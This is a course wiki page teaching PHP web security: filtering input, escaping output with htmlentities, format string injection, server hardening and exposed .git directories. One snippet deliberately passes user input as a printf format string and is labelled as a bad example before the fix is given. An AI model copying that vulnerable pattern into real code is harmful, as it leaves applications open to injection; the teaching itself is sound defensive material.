Web Application Security, Part 1

From CSE330 Wiki

Latest revision as of 21:05, 18 July 2018

Application-level web security is of increasing concern among web developers. This article outlines some types of security threats to your web application and how to defend against those threats.

This is Part 1 of the Web Application Security article, geared toward the material covered in Module 2. For material covered in Module 3 (MySQL), see Web Application Security, Part 2. For material covered in Module 6 (JavaScript), see Web Application Security, Part 3.

Introduction to Application-Level Web Security

Every day, computer hackers around the world penetrate web applications, often for personal profit. You may find it hard to believe, but even high-profile web sites (banks, social media, even computer security companies) are vulnerable to application-level attacks!

Not only is it embarrassing to be the programmer who wrote the vulnerable code, but it could also cost you your job. As a prudent web developer, it is imperative that you take precautionary measures to make your application difficult to penetrate. Indeed, most of the time, if your site is well-written, hackers will just move on.

Here's the golden rule: Anything in your site that accepts user input, whether via a form, an AJAX request, a file upload, or even malformed links, can be used as an attack vector. NEVER TRUST USER INPUT!!! This can be summarized in the acronym FIEO, or Filter Input, Escape Output.

FIEO in PHP

Filtering Input

"Filter Input" means that you should check that input data is in the format you expect. If you expect a number, cast it to a float or an int. If you expect a phone number, run it through a regular expression (you will learn regular expressions in Module 4). For example:

<?php
// Cast a number to a float or an int:
$amount = (float) $_POST['amount'];

// Pass a phone number through a regular expression; \A and \z anchor the
// pattern so the whole input must match, not just a substring of it:
$phone = preg_match('/\A\d{3}-\d{3}-\d{4}\z/', $_POST['phone']) ? $_POST['phone'] : "";
?>
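
A cast never fails: it silently turns a string such as "12abc" into 12.0. Where malformed input should be rejected instead of coerced, a stricter variant might look like the following minimal sketch. The helper names parse_amount and parse_phone are hypothetical and not part of the original example; filter_var and FILTER_VALIDATE_FLOAT are standard PHP.

```php
<?php
// Hypothetical helpers (illustration only): validate the input and
// return null when it is malformed, instead of coercing it.

function parse_amount($raw): ?float
{
    // FILTER_VALIDATE_FLOAT returns false for strings such as "12abc",
    // whereas (float) "12abc" silently yields 12.0.
    $value = filter_var($raw, FILTER_VALIDATE_FLOAT);
    return $value === false ? null : $value;
}

function parse_phone($raw): ?string
{
    // \A and \z anchor the pattern to the entire string.
    if (is_string($raw) && preg_match('/\A\d{3}-\d{3}-\d{4}\z/', $raw) === 1) {
        return $raw;
    }
    return null;
}

// Missing fields are treated the same way as malformed ones.
$amount = parse_amount($_POST['amount'] ?? null);
$phone  = parse_phone($_POST['phone'] ?? null);
```

Returning null lets the calling code tell "missing or invalid" apart from a legitimate value such as 0 or an empty string.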

Escaping Output

"Escape Output" means that you need to nullify, or escape, characters that have special meaning in the markup language of interest. For example, consider the following string:

If a<b and b<c then a<c.

Since a less-than sign means the start of a tag in HTML, and b is a valid tag name, the above string will not render as you might expect in HTML. Therefore, we need to escape our less-than signs by using HTML entities:

If a&lt;b and b&lt;c then a&lt;c.

The "&lt;" is an HTML entity that will render as a less-than sign. (For more information on HTML entities, read this article on the WebPlatform wiki: https://webplatform.github.io/docs/html/entities)

PHP provides a function, htmlentities, that converts the special characters in a string to their HTML entity equivalents:

<?php
$str = "If a<b and b<c then a<c.";

// Convert special characters to HTML entities before outputting:
echo htmlentities($str);
?>

Note: htmlentities escapes a string for use in HTML, but it does not escape a string for use in other markup languages. You need to use different methods when escaping strings for other languages.
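
To illustrate the note above, here is a rough sketch of the same value escaped for three different output contexts. The variable names and the search.php URL are made up for this example; htmlentities, rawurlencode, and json_encode are standard PHP functions.

```php
<?php
$name = 'Tom & "Jerry" <cats>';

// HTML text or attribute value: convert markup characters to entities.
$safe_html = htmlentities($name, ENT_QUOTES, 'UTF-8');
$html = '<p title="' . $safe_html . '">' . $safe_html . '</p>';

// URL query string: percent-encode the value.
// (search.php is a hypothetical page used only for illustration.)
$url = 'search.php?q=' . rawurlencode($name);

// JavaScript literal inside a <script> block: JSON-encode the value and
// hex-escape the characters that could end the script tag or a quote.
$flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
$js = 'var name = ' . json_encode($name, $flags) . ';';
```

Each context has its own set of special characters, so escaping that is correct for one context can be useless or harmful in another.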

Why Not to Escape Input

Filtering your input is important, as shown above. However, it is bad practice to escape your input. For example, don't do this:

<?php
$message = htmlentities($_POST['message']); // bad practice
// then store $message in a database, etc.
?>

The reason this is bad practice is that it permanently ties that string to its final output format. For example, what if some time down the road you want to support display of that message in a PDF? You'd need to go back and remove all the HTML entities again.

This is why you should filter strings at the input stage but not escape them until the final output stage.
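
The following small sketch shows the practical difference. The $stored variable is a stand-in for a database row and is purely illustrative. Escaping once at output time gives the expected result, while a value that was already escaped on input gets mangled when the output stage escapes it again.

```php
<?php
// Stand-in for a value read back from a database (illustration only).
// It is stored exactly as the user submitted it.
$stored = 'If a<b and b<c then a<c.';

// Escape at the moment of output, once per output format:
$as_html = htmlentities($stored, ENT_QUOTES, 'UTF-8');
$as_text = $stored; // plain-text e-mail, PDF text, and so on

// What happens when the value was also escaped on input:
$escaped_on_input = htmlentities($stored, ENT_QUOTES, 'UTF-8');
$double_escaped   = htmlentities($escaped_on_input, ENT_QUOTES, 'UTF-8');

echo $as_html, "\n";        // If a&lt;b and b&lt;c then a&lt;c.
echo $double_escaped, "\n"; // If a&amp;lt;b and b&amp;lt;c then a&amp;lt;c.
```

A browser would display the double-escaped string with literal "&lt;" text in it, which is a common symptom of escaping at the wrong stage.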

Format String Injection

If you like using functions like printf and sprintf, you may find yourself writing:

printf( "%s", htmlentities($_GET['username']) ); // good example

It is tempting to reduce this to:

printf( htmlentities($_GET['username']) ); // BAD example

Although the second implementation will work for most usernames, it is not correct! You are essentially making the client-provided username the format string for printf. If the username contains a percent sign (%), it will be interpreted as the start of a conversion specification in the format string. Because no matching argument is supplied, the call fails with a warning or an error, depending on the PHP version. Worse yet, it is known that certain combinations of format parameters will actually reveal system information in the error log.

Solution

The solution is simple: never use dynamic input as the format string. The format string should always be static, either hard-coded or loaded from a stable source like a YAML file. User-supplied input should always be passed to sprintf and printf as arguments.

If you are outputting only one little string like in the example above, it suffices to use a PHP function like print or echo:

print htmlentities($_GET['username']); // good example
echo htmlentities($_GET['username']); // good example
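
When a longer message does call for sprintf, the same rule applies. Here is a minimal sketch, assuming a hypothetical greeting helper that is not part of the original article: the format string is a constant, a literal percent sign is written as %%, and the untrusted value only ever appears as an argument.

```php
<?php
// Hypothetical helper (illustration only). The format string is fixed,
// so nothing in $username can be interpreted as a format directive.
function greeting(string $username): string
{
    return sprintf(
        'Welcome back, %s! You are 100%% logged in.',
        htmlentities($username, ENT_QUOTES, 'UTF-8')
    );
}

// A hostile-looking username is treated as plain data:
echo greeting('50%s off <b>'), "\n";
// Welcome back, 50%s off &lt;b&gt;! You are 100% logged in.
```

The "%s" inside the username survives untouched because sprintf only parses its first argument for format directives.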

Server Configurations

Sometimes hackers attempt to penetrate your application from the server side rather than the application side. Server-side security is beyond the scope of this course, but here are some things you should keep in mind.

  • Use a strong root password, and make sure it is one that you don't use anywhere else. Seriously.
  • Use a firewall to block unnecessary ports from public access. SSH and the web server should really be the only ports you need. You should keep the web server on port 80, but you have the option of moving SSH to a port other than 22 to make it slightly more secure.

Git Exposed

Another thing to keep in mind is that by default, Apache serves up everything in your file tree, except for Apache-specific configuration files like .htaccess. This means that if you're not careful, your .git directory can be served, exposing your raw source code to attackers, including things like database passwords! A recent study found that one in every 600 web sites is making this mistake (http://www.jamiembrown.com/blog/one-in-every-600-websites-has-git-exposed/). Don't be one of them!
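
One possible way to block access is sketched below. It assumes Apache 2.4 and that you can edit the main server or virtual host configuration, since the DirectoryMatch directive is not allowed inside .htaccess files. Treat it as a starting point, not a complete hardening recipe.

```apache
# Assumption: Apache 2.4, placed in the server or virtual host config.
# Deny every request that maps to a .git directory or anything inside it.
<DirectoryMatch "/\.git(/|$)">
    Require all denied
</DirectoryMatch>
```

Keeping the repository outside the document root altogether, and deploying only the files that need to be public, avoids the problem without relying on server configuration.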